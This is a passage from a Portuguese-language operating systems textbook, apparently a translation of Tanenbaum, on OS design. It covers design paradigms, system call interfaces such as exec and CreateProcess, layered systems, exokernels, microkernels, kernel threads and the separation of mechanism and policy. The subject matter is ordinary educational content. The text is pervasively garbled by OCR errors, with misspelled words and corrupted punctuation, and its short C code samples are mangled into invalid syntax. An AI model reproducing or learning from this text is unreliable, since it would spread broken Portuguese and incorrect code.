ver do disco) para fazer o trabalho. 

O Amoeba e ainda mais simplcs; tern somente urna 
chamada de sistema: executar chamada remoia de proce- 
dimento. Essa chamada cnvia uma mensagem c espera por 
urna resposta. Ć essendalmente o mesmo que o sendrec do 
MINDC.Todo o resloe constrmdo sobre essa unita chamada. 

Prindpio 3: eficiencia 

O terceiro princtpio e a eficiencia da implementaęao. 
Sc uma caracieristka ou urna chamada de sistema nao pu¬ 
der ser ii lipienie mada de modo eficiente, provavelmente 
nao vale a pena te-la. Tambem deve ser imuitivo para o 
programador o ąuanlo custa uma chamada de sistema. Por 
exemplo, os programadores do UN1X esperam que a cha- 
roada de sistema iseek seja mais ba rata do que a chamada de 
sisiema reacf, pois a priineira simplesmente troca um pon- 
teiro na memória, ao passo que a segitnda cxecuta entrada 
e saida no disco. Sc os tustos imuitivos cstivcrem errados, 
os programadores escreverao programas ine fi cierne men lc. 

13.2.21 Paradigmas 

Unia vez que os objerivos foram estabclecidos, o proje¬ 
to pode comeęar, Um bom porno dc partida e pensar sobre 
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como os clientes enxergarao o sistema. Uma das ąuestoes 
mais importantes e como fazer lodas as caractehsticas do 
sistema bem unificadas para formar aątiilo que e muiias 
vezes chamado dc coerencia arąuitetural. Nesse sentido, 
c importantc difcrcnciar dois tipos dc 'clientes' dc sistemas 
opcracionais. Dc um lado, cxistcm os usuańos, quc intc- 
ragem com os programas aplicativos; do outro lado cslao 
os programadom, quc escrcvcm esses programas. Os pri- 
meiros, na maioria das vczes, i me ragę m com a imerface 
grafica; os outros, em geral, inieragem com a imerface de 
chamada de sistema. Se a imenęao e ler uma tinica imerfa- 
ce grafica abrangendo o sistema todo, como no Macintosh, 
o projeto deveria inidar por ela. Se, por mitro lado, a in- 
tenęao e dar su porte a muitas imerfaces graficas, como no 
UNIX, a interface dc chamada dc sistema deveria ser pro- 
jctada primdro. Fazer primeiro a imerface grafica impiica 
urn projeto dc cima para baixo, As qucsiocs importantes 
sao: quais caractehsticas cla tera, como os usuarios vao in- 
leragir com da e como o sisiema deveria set projetado para 
dar suporte a da? Por exemplo, se a maioria dos programas 
mostra fcones na tela e depois espera a te qtie o usuario cli- 
que sobre eles r isso sugere um modelo oriemado a eventos 
para a interface grafica e provavelmente tambem para o 
sistema operadonal. Por ouiro lado, se a tela e, na maioria 
das vezes p cheia de janelas de texto r entao um modelo no 
qual os processos leem do tedado provavelmente e melhor. 

Fazer primeiro a interface de chamada de sistema im- 
plica um projeto de baixo para cima, Nesse caso, a questao 
e: de quais tipos de caractensticas os programadores em ge- 
rai predsarri? Na verdade, nao sao necessarias muiias carac- 
terfsiicas especiais para dar sttporte unia imerface grafica. 
Por exemplo, o sistema gerenciador de janelas do UN1X, X, 
e simplesmente um grandc programa em C que faz reads e 
writes no tedado, no mouse c no vidco, O X foi desenvolvido 
tempos depois do UNJX c nao cxigiu muitas altcraęocs do 
sistema operadonal para fazć-lo fund on ar Essa expericncia 
validou o falo de que o UNIX era suficientemeiite completo, 

Paradigmas da interface do usuario 

Para ambas as imerfaces em nfvel de interface grafica e 
em nfvel de chamada de sistema, o aspecto maisimportante 
e a existenda de um bom paradigma (as vezes chamado de 
metafora) para fonie cer uma mancira de enxergar a int erface, 
Muiias imerfaces graficaspara computadores pcssoais usam 
o paradigma WIMP, discutido no Capitulo 5, Esse paradigma 
usa o aponie e clique, aponte e clique duplamente, arrasie e 
outros idiomas por toda a interface para fornecer uma coe- 
rencia arątiitetural para o todo. Muiias vezes existem ne- 
cessidades adicionais para os programas, como a existencia 
de uma barra de menu com ARQUIVO, EDITAR e omras 
entradas, cada uma delas com certos itens de menu bem 
conheddos. Dessa maneira, os usuarios que conhecem um 
programa podem rapidamente aprender outro, 

Contudo, a interface de usuario WIMP nao e a tinica 
posshel. Alguns computadores de mao usam uma imerface 
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estilizada de escrita a mao. Os dispositivos de multimfdia 
dedicados padem usaruma interface do tipo VCR. E, ohvia- 
mente, a entrada de voz tem um paradigma completanien¬ 
ie diferentc. O importame nao e tamo o paradigma esco- 
Ihido, mas o fato dc cxistir um unico paradigma dominantę 
quc imifiąue toda a interface do usnaiio. 

Sempre que um paradigma e escolhido, e importame 
que lodos os apiicativos o utilizem. Ccmsequentemente, os 
projetistas de sistemas precisam fornecer bibfiotecas e fer- 
ramentas para os desenvolvedores de aplicaęóes que Ihes 
permitam acessar procedimentos que produzam urna in- 
terface com estilo uiiiforme. O projeto da interface do ustki- 
rio e muito import antę, mas nao ć o assimto dcstc livro, 
dc modo quc voltaremos ao tema da interface do sistema 
operacional. 


Paradigmas de execuęao 

A coerimcia arąuiteturai 6 import antę no nivel do 
usua rio, mas igualmente importantc no mvel da interface 
de chamadas de sistema, Nesse caso, e frequeniemente uli) 
diJercndar entre o paradigma dc execuęao c o paradigma 
de da des, de modo que descreveremos ambos, i nicią n do 
com o primeiro. 

Dois paradigmas de execuęao sao amplamcnic conhe- 
cidos: o algoritmico c o orientado a evcntos. O paradig¬ 
ma algoritmico baseia-se na ideia dc que um program a e 
inicializado para executar alguma funęao que de conhece 
aritccipadamente ou que deve obtcr a partit dc sens para- 
inctros. Essa ftmęao pode quercr compilar um programa, 
fazer a folha de pagamento ou pilotar um aviao para Sao 
Francisco. A Iógica bastca e fixada em código no qual o pro- 
grama faz chamadas de sistema de icmpos em lempos para 
obi er a entrada do usuario, os scrvięos do sistema operacio¬ 
nal etc, Essa cstrategia e csqucmatizada na Figura 13.1 (a). 

Outro paradigma de cxecuęao e o paradigma orien¬ 
iado a eventos, apresentado pela Figura 13.1 (b). Nesse 
caso, o programa exccuta algom tipo de inicialŁzaęao — por 
exernplo, m ostra urna certa Lola — e depois espera que o 
sistema operacional o informę sobre o primeiro eveiuo. O 
evento muitas vezes ć urna leci a pressionada ou um movi- 


main() 

{ 

me$s_t msg; 


main() 

{ 

int 

irtt(); 

do_something(); 
read(...}; 

do_sorriGłhtng_else(); 
wnte(...); 
keep_going[); 
exit(0); 
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init{): 

while (get_message(&msg)) ( 
switch (msg.type} t 
case 1:; 
case 2:...; 
case 3:...; 

} 

} 


W 


I Figura 13,1 (a) Código algoritmico. [b) Código orientado a 
eventos. 


niemo do mouse. Esse projeto e util para programas alta- 
nieme imerativos. 

Cada unia dessas maneiras de projetar o sistema eon- 
duz a um estilo próprio de programaęao. No paradigma 
algoritmico, os algoritmos sao centrais e o sistema opera¬ 
cional e eon si dera do um provedor de servięos. No para¬ 
digma orientado □ evcmos, o sistema operacional tambern 
fornece servięos, mas esśa ftmęao e ofuscada pela funęao 
de coordcnador de atividades dc usua nos e de gerador dc 
evenios qtie sao constimidos pelos processos. 

Paradigmas de dados 

O paradigma de execuęao nao e o unico exportado pelo 
sistema operacional Urn outro igualmente import antę e o 
paradigma de dados. A questao principal. nesse caso e como 
as estruturas do sistema e os dispositivos sao apresentados 
ao programador. Nas prirneiras versocs dos sistemas FOR¬ 
TRAN em loie, tudo foi modelado como uma fila magne- 
lica sequencial Os po co t es de cartoes de entrada eram tra- 
tados como fiias de entrada, os pacotes de cartóes a serem 
perfurados eram tratados como fitas de safda e a safda para 
a impressora era tratada como fila de safda. Os arquivos do 
disco tambern eram tratados como fitas. O accsso aleatório 
ao arquivo somente era posswel retrocedendo a lita alć a 
posięao correspondente do arqtiivo e lendo-o novamente. 

O mapeamemo era feito usando canoes de controle de 
tarefas, como estas: 

MOUNTjTAPEOS, REE1781) 

RUN(INPUT, MYDATA, OUTPUT, PUNCH, TAPE08) 

O primeiro cartao instrui o operador a pegar o rolo de 
lita 781 da prateleira de fitas e moma-lo no dispositivo 
de fila mi mero 8. O segundo canao instrui o sistema ope¬ 
racional a ex ecu tar o programa FORTRAN recem-compi- 
lado T mapeando INPUT (quc indica o lettor de canao) a 
lita Iógica ruj mero 1, o arquivo do disco MYDATA a fila 
Iógica mi mero 2 f a impressora (chamada OUTPUT) a fita ló- 
gica mimem 3, o perfurador de cartao (chamado PUNCH) 
a fita iógica rui mero 4 e o dispositivo de fila ffsico mi mero 
8 a fita Iógica niunero 5. 

O FORTRAN linha uma sintaxe [^ara lei tura e escrita 
em fitas lógicas. Lendo da fita Iógica mi mero I, o progra¬ 
ma obtinha a entrada via cartao* Escrevendo na lita Iógica 
ntimero 3, a safda aparecia pos ten ornie me na impressora. 
Lendo da fila Iógica ntimero 5, o rolo de fita 781 podia ser 
lido e assim por dianie. Notę que a ideia de fita era somente 
um paradigma para integrar o leitor dc cartao, a impressora, 
o perfurador, os arqtnvos do disco e as fitas. Nesse exemplo, 
somente a fita Iógica mi mero 3 era uma fila ffsica; o resto 
eram arquivos coinuns do disco (em spool). Tratava-se de 
um paradigma primilivo, mas foi o initio na direęao correta, 

Posteriormente chegou o UNIX, quc vai muito mais 
aiem com o uso do modelo "tudo e um arquivo v . Usando 
esse paradigma, lodos os dispositivos de entrada e safda sao 
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tratados como arquivos e padem ser abertos e manipulados 
como arquivos comuns. As declaraędes em C 

fdl - openffiler, 0_RDWR); 

m = open(7dev/tty ,p r O^RDWR)' 

abrem urn arquivo verdadeiro no disco e o terminal do usua- 
rio (tedado + monitor). As dęcia raęóes subscqucntes padem 
tisat fdl c fdl para lor e cscrever ndcs, respcctivamcnlc, 
Daąudes comaudos em dianie, nao existc difcrenęa entre 
aeessar o arquivo c accssar o terminal exccto que posicio- 
namentos alealórios (mk) no terminal nao sao permitidos* 

O UNIX nao somenlc imilica os arquivos c os disposi- 
tivos de enlrada e safda, mas lambcm pcrmite que ontros 
processos sejam acessados, via pipes, como arquivos. Alem 
disso, ąuando sao suportados arquivos mapeados, urn pro¬ 
cesso pode obteracessoa sua própria memória virtual como 
se ela fosse um arquivo. Por fim, nas versoes do UN1X que 
possuem sistema de arquivos /proc, a dedaraęao C 

fd3 = open(7proc/501", G.RDWR); 

permite ao processo (tentar) aeessar a memória do proces - 
so 501 para leitura e escrita usando o dcscrilor de arquivo 
fd3 — algo util para, digamos, urn depurador. 

O Windows Yista vai ainda mais alem e lenia fazer 
com que tuda se pareęa com urn objęto. Unia vez que urn 
processo tenha adąuirido um identificador vahdo para mn 
arquivo, nm processo, um semafora, urna caixa de correio 
ou outro objęto do nudeo, pode execmar operaęoes sobre 
ele. Esse parad]gma e ainda mais geral do que o do UNIX e 
do que o do FORTRAN. 

A unificaęao dos paradigmas lambem ocorre em ou- 
tros contextos. Um deles e import a me mencionar aqui: a 
Web. O paradigtm por tras da Web e que o ciberespaęo e 
cheio de documentos, cada um com um URL. Digitando 
um URL ou clicando em urna entrada li gada a um URL, 
voce obtem o documemo. Na realidade, mu Stos 'docu- 
mcmos' nao existem de fato, mas sao gerados por um pro- 
grama ou por u tu script de shell de mtcrface quando urna 
solicitaęao e recebida. Por exemplo, quando um usuario so¬ 
lid ta cm uma Soja viriual urna lista de CDs dc um arii sta 
cm particular, o documcnto e g era do naquele momemo 
por um programa — ele certa menie nao existia a mes de a 
solicitaęao ter sido feita, 

Ate agora vimos quatro casos, cm quc tudo pode ser 
lita, arquivo, objcto ou documcnto. Em todos os quairo 
casos, a intenęao e unificar dados, dispositivos c outros rccur- 
sos, de modo que scja facil Irabalhar com des, Todo si stema 
operacional deve ter um paradigma de unificaęao de dados, 

_ 15-2-5 1 A interface de chamadas de 

sistema 

Sc acredifamos na teoria dc Corbató sobre o mecanis- 
mo mmimo, en tao o sistema operacional devc fomecer o 
mmimo possfvel de chamadas de sistema c cada uma deve 
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ser a mais simples possfveI [mas nao mais simples do que 
isso). Um paradigma unificador de dados pode desempe- 
nhar um papel importante nesse caso. Por exemplo, se ar- 
quivos, processos, dispositivos dc entrada c saida e muito 
mais forem vistos como arquiv r os o u objetos, entao todos 
cles poderao ser lidos com uma linica chamada dc sistema 
nea<± Caso contrario, pode ser necessario separar as chama¬ 
das em readjiie, read_proc e readjty, entre out ras, 

Em alguns casos, as chamadas de sistema podem pare- 
cer predsar de diversas variantes, mase uma pratica muitas 
vezes melhor ter uma chamada que tratę o caso geral, com 
diferentes rotinas dc bibliotccas para escondcr esse fato dos 
program a dor es. Por cxcmplo, o UNIX tern uma chamada 
de sistema para sobrepor o cspaęo de endcrcęamento virtu- 
al de um processo; exec, A chamada mais geral c 

exec{name, argp f envp); 

que canega o arquivo executavel ncłme, dando a ele ar- 
gumemos a pomad os por tw$p e as variaveis ambientais 
apomadas por envp. As vezes, e eonvenieme listar os argu- 
mentos explicitamente e, nesse caso, a biblioteca contem 
rotinas que sao chamadas conforme segue: 

^eclfnarrie, argO, argl, argn, 0); 
exede(narne, argO, argl, .... argn, wp); 

Tudo o quc esses procedimentos fazem ć colocar os ar- 
guincntos em um veror c depois cha mar exec para realizar 
o trabalho. Essa organizaęao ć a melhor dc a mb os os mun- 
dos: uma chamada de sistema unica e direta mantem o sis- 
tema operacional simples e ainda ofercce ao programa dor a 
coiweniencia de cha mar exec de varias maneiras* 

Obvlamente, a existencia de uma chamada para tra- 
tar todos os casos possfvels pode facilmemc levar a perda 
do com role. No UNIX, a criaęao de processos rcquer duas 
chamadas: forK, seguida por exec. A primdra nao tem para- 
melros; a segunda leni tres, Em contrapartida, a chamada 
da A Pi Win 32 pa ra a criaęao de processo — CreateProcess — 
tem dez para met ros, um dos quais e um ponteiro para uma 
estru tura com 18 parameiros adicionais. 

Ha muito tempo, alguem dcveria ter p erg u mad o se 
aconteccria algo tcrriVcl se dcixasscmos algum desses pa¬ 
ra metros dc fora. A resposta sinccra teria sido: *Em alguns 
casos os programadores podem ter mais trabalho para ob¬ 
ici um efeito desejado, mas o resultado Ifąnido teria sido 
um sistema operacional mais simples, menor e mais con- 
fiavelri Obviamenie, a pessoa que propos a versao de 10 
+ 18 para metros deve ter argumentado: "Mas os usuarios 
gostam de todas essas caracteristicas". A contestaęao pode 
ter sido de que des gostam muito mais de sistemas que 
u sam pouca memória e nunca travam. A pondoraęao entre 
mais fundonalidade a custa dc mais memória e no mmimo 
visfvd e pode ter um preęo (visto que o preęo da memó¬ 
ria e conhccido), Entretanto, e dificil estimar o niimcro de 
travamcntos adicionais por ano que vai ocorrer como re- 
sullado da adięao de alguma caractenstica, bem como se os 
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usuarios far łam a mesma escolha caso soubessem do preęo 
escondido. Esse efeilo pode ser resumido na pnmeira lei de 
software de Tanęnbaum: 

A adięao de mais código adidona mak erros . 

A adięao de mais caraacnsticas adidona mais código e, 
assirn, adidona mais erros. Os programadores quc acham 
que a adięao de novas cara eter isti ca s nao gera novos erros 
ou sao novatos eni cornpuiatiores on acreditam que inna 
fada madrinha esta olliando por eles. 

A simpUridade nao e a unica ąuestao quc surge no 
projeto de chamadas de sistema* Unia importante conside- 
raęao e resimiida na trasę de Lampson {1984): 

Nao esconda pokndai 

Se o hardware tem um rneio exiremamente efidente 
de fazer algo, isso deve ser exposto aos programadores de 
urna rnaiicira simples e nao emerrado dcnlro de alguma 
oulra abstraęao. O propósito das abstraęóes e escondcr as 
propriedades indesejaveis, e nao as desejaveis* Por exem- 
plo, suponha qne o hardware tenha urna soluęao espedal 
para mover graodes mapas de bits na area da tela (isto e, 
a RAM de video) em alta vdoridade. Nesse caso, e justi- 
ficavel impkmentar unia nova chamada de sistema que 
de acesso a esse mecanismo, em vez de simplesmente for- 
necer mecanismos para ler a RAM de vtdeo na memória 
prindpal e escreve-la de vo!ta mwamente. A nova cha ma¬ 
da deve apenas mover bits e nada mais. Se unia chamada 
de sistema e rapida, os usuarios podem senipre consiruir 
interfaces mais convenientes sobre ela. Se ela e lenta, nin- 
guem val usa-la, 

Outra ąuestao de p roje to e o em pręgo de chamadas 
orientadas a conexao wrarssem conexao. As chamadas de 
sistema do UN1X padrao e do Win 52, para kiltira de um arąui- 
vo, sao orientadas a concxao. Primetro voce abrc um arquivo, 
depois faz a leitura e finał men te o feclia. Alguns proto- 
colos de acesso a arquivos remotos tambem sao oriemados 
a conexao. Por exemplo, para usar FTP, o usuario obtem 
primeiro a permissao de acesso a maquina remota, le os 
arquivos e depois en cena sua conexao. 

Por outro lado, alguns prolocolos de acesso a arqmvos 
remotos nao sao oriemados a conexao, como o p rot o colo 
da Web (HTTP), por exemplo. Para ler urna pagina da Web, 
voce simplesmente a solicita; nao existe a neccssidade de 
ajuste amecipado (uma eonexao TCP 4 neccssaria, mas ela 
e feita em um nfvel interior do protocolo; o protocolo HTTP 
dc acesso a Web e sem concxao). 

A ponderaęao prindpal entre qualquer mecanismo 
orientado a conexao e outro sem conexao esta entre o 
trabalho adidona! necessario para cstabdecer o mecanis¬ 
mo (por exemplo, a abertura de um arquivo) c a vanla¬ 
gę m de nao ter de fazer isso nas (possivelmente miii ta s} 
chamadas subseąuemes, Para a H/S de um arquivo em 
urna maąuina isolada, ern que o custo do estabekęimcmo 
da conexao ć baixo, provave!mente a forma-padrao (pri¬ 
meiro abre, depois usa} seja a meIbor maneira. Para os 


sistemas de arquivos remotos, a situaęao pode ser feita de 
ambas as maneiras. 

Oulra ąuestao rdacionada a interface de chamadas dc 
sistema e a visibi lida de* A lisia de chamadas de sistema aceila 
no P0$1X e faril de encontrar. Todos os sistemas UNTX da o 
suporte a essas chamadas, bem como um pequeno nu mero 
de outras tantas, mas a lista completa e sempre publica. Em 
comrapartida, a Microsoft nunca tornou publica a lista de 
chamadas de sistema do Windows Vista. Em vez disso, a API 
Win52 e outras APIs sao publicas, mas essas interfaces eon- 
tem um grandę nu mero de chamadas dc bibliotece (mais 
de dezmil),csomcntc um pcqtienoinimero c de chamadas dc 
sistema verdadriras* O prindpal argument o para tornar 
publicas todas as chamadas dc sistema e que isso perniite 
que os programadores saibam o que e barato ( funęoes exc- 
cmadas no espaęo do usuario) e o que e caro (chamadas de 
nucko). A argumentaęao para nao toina-las publicas e que 
isso da aos impkmentadores a flexibilidade de alitu ar in¬ 
tern ani en tc as chamadas de sistema reais subjacentes para 
deixadas melhor, sem destnhr os programas do usuario. 

Implementaęao 

Esqucccndo as interfaces de chamadas dc sistema e o 
usuario, vamos ver como implementar um sistema opera- 
cional. Nas próximas oito seędes serao examinadas algu- 
mas questdes conceituais gerais reladonadas a estrategias 
de impkmentaęao. Logo em seguida, conheceremos algu- 
mas Lecnicas de baixo nweł que muitas vezes sao uteis. 

15,3.1 I Estrutura do sistema 

Provavelmenie, a pnmeira decisao que os programa¬ 
dores devem toinar e qual sera a estrutura do sistema. 
Examinamos as possibilklades principais na Seqao 1.7, mas 
vamos revisa-las aqui. Um projeto monolitico nao estrum- 
rado nao e realmente unia boa idcia, exceto talvez para um 
sistema opera cional pequeno — digamos, de um refrigera- 
dor—, mas ainda assiin e questionavel. 

Sistemas em camadas 

Uma estraiegia razoavel qtie tem sido bem esiabekeida 
ao longo dos a nos e um sistema em camadas. O sistema THE 
de Dijkstra {Tabela 1.3) foi o primeiro sistema operadonai 
em camadas, O UN1X e o Windows Vista tambem tem uma 
estrutura em camadas, mas o uso das camadas em ambos e 
mais uma maneira dc tentar dcscrcvcr o sistema c nao um 
prindpio rcal dc projeto usado na construęao do sistema. 

Para um novo sistema, os p roje Cis ta s que optarem por 
esse caminho devem primeiro eseolher muito cuidadosa- 
mente as camadas e defmir a funcionalidade de cada uma. 
A camada inferior sempre deve tentar esconder as carac- 
terfsticas mais espccfficas do hardware, como o HAL faz 
na Figura 11.3. Provavehuentc r a próxima camada dcvc 
trata r intcrmpęóes, trocas dc contexto c a MMU c, a ci ma 
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desse mvel, o código deve ser, em sua maioria, indepen¬ 
denta de maguina. E, ant es de tu do, projetistas diferentes 
lerao gostos (c icndencias) diferentes. Uma possibilidade 
e projetar a ca ma da 3 para gerenciar threads, mcluindo 
escalonamento e sincronizaęao entrc threads, como mos- 
trado na Figura 13,2, A ideia aqui e que, a partir da cama- 
da 4, ja tenhamos threads apropriados sendo escalonados 
normaImenie e sincronizados medianie urn mecanismo- 
-padrao (por cxcmplo, mutcxcs). 

Na ca mada 4 podemos encontrar os drivers des dis- 
positivos, ca da um cxcanando como urn ilircad sępa rad o, 
com seu próprio estado, contador de programa, registrado- 
res etc,, possivelmente (mas nao necessariamenie) dentro 
do espaęo de endereęamento do nucieo, Esse projeto pode 
simpłificar bastante a estrutura de E/S, pois, quando ocorre 
uma imerrupęao, ela pode ser converiida para urn unlock 
sobie um irmtex e uma cha mada ao escalonador para (po- 
tencialmente) escalonar o thread, quc estava bloqueado 
no miHex, que emrou no estado dc promo. O MIN1X im 
essa tatica, mas no UNIX, no Linnx e no Windows Vista os 
tratadores de interrupęao executam em um lipo de 'terra 
de nlnguem', em vez de exccuiarem como threads auien- 
ticos que podcm ser escalonados, suspensos etc, Visto quc 
a maior parte da compl exida de de qualqtter sistema ope- 
radona) esta na E/S, qualqucr tccnica para tornada mais 
tratavel c encapsulada e importante. 

Acima cfa ca ma da 4, podenamos esperar encontrar a 
memória virtual, um ou mais sistemas de arquivos e os 
tratadores de chama da s de sistema* Se a memória virtual 
esta em um mvel mais abaixo que os sistemas de arquivos, 
entao a cache de blocos pode ser pagrnada para o disco, 
pennitindo que o gerendador de memória viriual determi- 
ne dinamicamente como a memória real deve ser dividida 
entre as paginas do u su ario e as paginas do mi ciec, indu i li¬ 
do a cache. O Windows Vista trabalha assinn 

Exokernel 

Enquanto a divi$ao em ca ma da s tern seus incemiva- 
dores entre os projetistas de sistemas, existe tambem um 
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outro grupo com uma visao precisamente oposta (Engler et 
ai., 1995), combase no argumentoponta a ponta (Saltzer 
et al, i 984). Esse conceito diz que, se algo tern de ser feito 
pelo próprio programa do usuario, e dispendioso faze--lo 
tambem cm uma camada inferior. 

Comiderc uma aplicacao desse princtpio no acesso a ar- 
quivos remotos. Se um sistema esta preocupado com a cor- 
rupęao de dados em transito, cle deve providendar para que 
cada arąuiyo seja verificado contra erros no momento em 
que de e escrito e o código de cłiecagem deve ser arma- 
zenado com o arquivo + Quando um arquivo e iransferido 
pda rede do disco de origem para o processo destinaiario, o 
código de checagem e iransferido tambem e recalculado no 
recebimemo. Se os dois valores do código nao sao corres- 
pondentes, o arquivo e descartado e iransferido novamente. 

Essa verificaęao e mais precisa que o uso de um prolo- 
colo de rede confiavel, visio que ela tambem detecta erros 
de disco, de memória, de software nos roteadores e outros 
erros alem dos de transmissao dc bits. O argumento fim a 
firn diz que o uso de um protocolo de rede confiayel nao e 
necessario, uma vez que o porno finał (o processo receptor) 
tenha informaęaosuficieme para yerificar a correęao do ar- 
quivo. O uso de um protocolo de rede confiavel nessa visao 
se justifica por questoes de efirienda — isto e, a detecęao e 
o reparo dos erros dc transmissao mais ccdo. 

O argumemo fim a firn pode ser estendido para qua- 
sc łodos os sistemas operacionais. Essa ideia defende quc 
o sistema opcracional nao dcve fazer tu do aąuilo quc o 
programa do usuario e capaz de fazer por si próprio. Por 
exemplo, por que ter um sistema de arqttivos? Deixe que o 
usuario leia e escreva no disco de uma maneira protegida. 
Obviamenie, a maiooa dos usuarios gosta de ter arquivos, 
mas o argumento lim a fim diz que o sistema dc arquivos 
deveria ser uma rotina de biblioteca ligada com qualquer 
programa que predsc usar arquivos. Essa pratica permUe 
que diferentes programas ten ha m diferentes sistemas de 
arquivos. Essa lin ha de radocmiu diz que o sistema opera- 
cional deveria a pen as alocar recursos de modo seguro (por 
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I Figura 13,2 Um possiyei projeto para um moderno sistema operacional em camadas. 
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exemplo, a CPU e os discos) emre os usuarios concorren- 
tes. O ExokerneI e urn sistema operadonal construido de 
acordo com o argumentu firn a fim (Engler et al., 1995). 

Sistemas dlente-semdor baseados em micronucleo 

Um meio-termo entre o sistema operadonal ter de 
fazer tudo e nao lazer nada e o sistema operadonal fazer 
um pouco, Essa kleta leva ao micronucleo, em que muitas 
partes do sistema operadonal executam como processos 
serviclores no mvd do usuario, como ilustra a Figura 13,3. 
De todas as ideias, essa e a mais modular e flexfvel. O maxi- 
mo da flexibilidade consiste em permitir que cada driver de 
dispositivo tambem execute como um processo do usuario, 
lotalmente protegido contra o nucleo e outros drivers, mas 
a modularidade aumenta rnesrno quando os drivers de dis- 
positivos funcionam no modo nucleo. 

Quando os drivers estao no nucleo, ełes po dem aces- 
sar os registros de disposiiivos de hardware diretameme. 
Quando nao estao, algum mecanismo se faz necessario 
para ofereeer essa fadlidade. Se o hardware assirn o permi- 
lissc, cada processo de driver poderia ter acesso a somente 
os dispositivo$ de E/S de que ele necessitasse* Por exemplo, 
com E/S mapeada na memória, cada processo de driver po- 
deria tera pagina para seu dispositivo mapeada na menió- 
ria, mas nenhuma pagina de otitro dispositivo. Se o espaęo 
de endereęamemo da porta de E/S puder ser pardalmente 
protegido, a parte correta dele podera ser disponibilizada 
para cada driver. 

Mesmo que nenhuma assistencia do hardware esleja 
disponwel, a ideia ainda pode ser posta em pratica. Nesse 
caso, sera necessaria urna nova diamada de sistema, pos- 
sfvel somente para os drivers de disposiiivos, fornecendo 
urna lista de pares (porta, valor). O que o nucleo faz e pri- 
meiro verificar se o processo e o proprietario de todas as 
portas da lista. Em caso aftrmativo, eie entao copia os valo- 
res correspondentcs para as portas a fim de inicializar a E/S 
do dispositivo. Uma cha mada slmilar pode ser usada para 
Jer as portas de E/S de uma mancira protegida, 

Essa pratica evita que os drivers de dispositivos exa- 
m triem (e daniftquem) as estruturas de dados do nucleo, o 
que co stu ma ser uma boa coisa. Um conjunto analogo de 
chamadas poderia ser disponibilizado para permitir que os 
processos dc drivcrs leiam c escrevam em tabclas do nu- 


cleo, mas somente de modo controlado e com o consenti- 
mento do nucleo. 

O principal próbie ma com essa abordagem c com mi- 
cronudeo em geral e a perda de desenipenho causado por 
todas as trocas extras de contextos* En trel anto, pratica - 
mente todo o trabalho com micronucleo foi feito ha muitos 
anos, ąuatido as CPLJs eram rntiito mais lentas. Atualmen- 
te, sao bem poucas as aplicaęoes que usam cada gola da 
capacidade da CPU e nao podem tolerar uma perda mini¬ 
ma de desempenho, AfinaL quando se executa um pro- 
cessador de texto on navegador da Web, a CPU costuma 
fkar ociosa d uran te 95 por cento do tempo. Se um sistema 
operadonal baseado em micronucko transfonnasse um 
sistema de 3 GHz nao conliavd em um sistema de 2,5 GHz 
confiavel provavelmente poucos usuarios se queixariam* 
Afmal, a maioria deles era bem felizate pouco tempo atras, 
quando obtinham de sens com pula dor es a velocidade na 
epoca estupenda de I GHz. 

Yale ressaltar quc, embora os micronucleo nao sejam 
populares cm desktops, clcs sao largamcntc iitilizados em 
apardhos celulares, PD As, sistemas mdustriais, sistemas 
embarcados e sistemas militares, nos quais uma alta con- 
ftabilidade e essencial 

Sistemas extensiveis 

Com os sistemas diente-servidor discutidos anterior- 
meme, a ideia era colocar o maximo posswcl fora do nucleo. 
A abordagem oposla c colocar mais niódulos no nucleo, mas 
dc uma mancira protegida. A palavra-chave aqui c protegi- 
da r olwiamcme. Hstudamos alguns mecanismos de prote- 
ęao na Seęao 9.5,6, os quais i ni da f menie eram destinados 
a importaęao de applets pela imernet, mas igualmente 
aplicaveis na inseręao de códigos dc icrcdros no nucleo* 
Os mais importanics sao a eaixa dc arcia c a assinatura dc 
código, pois a inicrpretaęao nao e realmente pratica para 
o código do nucleo* 

Gbviamente, um sistema extensfvel por si próprio nao 
serve para estruttirar um sistema operadonal. Contudo, 
inicializando com um sistema mfnimo que possui pouco 
mais que um mecanismo de proteęao e depols adicionando 
módulos protegidos ao nucleo, um por vez, ate que se al- 
cance a fundo na li da dc d esej a da, u m sistema mmimo pode 
ser construido para a aplicaęao cm maos* Dcsse modo, um 
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novo sistema operacional pode ser construido sob medida 
para cada aplicaęao, por meio da indusao somente das par- 
tes necessarias. O Paramerium e um exemplo de tal sistema 
(Van Doorn, 2001 g 

Threads do nucleo 

Outra ąueslao relevante diz rcspeito aos threads do 
sistema, nao importando qual rnodelo dc estmturaęao 
soja o escolhido. Muitas vczes e convcnienie pcrmitir que 
os threads do nucleo tenham existencia independente de 
qualquer processo do usuario. Esses threads podem execu- 
tar em segundo piano, escrevendo paginas sujas para o dis¬ 
co, trocando processos entre a memória prindpal e o disco, 
e assim por dian te. De fato, o nucleo por si próprio pode ser 
estruturado totalmcnte eom esses threads, dc modo qtic, 
quando o usuario faz urna chamada de sistema, cm vcz de 
o thread do usuario executar em modo nucleo, esse blo- 
queia e passa o eon trele para um thread do nucleo, que 
assume o controle para realizar o trabalho. 

Alem dos threads do nucleo que es Li o executando em 
segundo piano, a maioria dos sistemas operacionais dispara 
niuitos processos servidures idaenwn) em segundo piano, 
Apesar de nao fazerem parte do sistema operadonal eles 
muitas vezes executam atividades do lipo 'do sistema'. Es- 
sas athidades podem mduir a obtenęao e o envio de e-mails 
e o atendimento a varios tipos de solicitaęoes de usuarios 
remotos, como FTP e paginas da Web. 

_ 13.3.21 Mecanismo versus politica 

Outro princfpio que auxitia na coerencia arąuitetural, 
mantendo ainda as coisas peąuenas e bem estruturadas, e 
a separata o do mecanismo da politica. Colocando o meca- 
nisnio no sistema operacional c deixando a politica para 
os processos do usuario, o sistema por si próprio pode ser 
mantido sem modificaęao, mesmo que exista a necessidadc 
dc trocar a politica. Ainda que o módulo de politica seja 
mantido no nucleo, ele deve ser isolado do mecanismo, se 
possivd, de modo que as alteraęoes no módulo de politica 
nao afetem o módulo de mecanismo* 

Para tornar mais clara a separaęao entre a politica c 
o mecanismo, vamos considcrar dois cxemplos do mu udo 
real. Como primeiro caso, considere u ma grandę cornpa - 
nIlia eom um departamento de rccursos himianos, encar- 
regado do pagamento dos salarios dos empregados, Ele tern 
computadores, soft war es, cheques em branco, acordos cotn 
ba ncos e de mais mecanismos para pagar os salarios. Gon¬ 
tu do, a politica — a deterininaęao de quem recebe quan- 
to — e eompletamente separada e deeidida pela gerencia. 
O departamento de rccursos humanos simplesmente faz 
aquilo que e solicitado a fazer. 

Como segundo exemp!a, imagiue um re sta mantę. Ele 
tem um mecanismo para servir rdeiędes, indu i n do mesas, 
pratos, garęons, unia cozinha totalmcnte equipada, acor¬ 
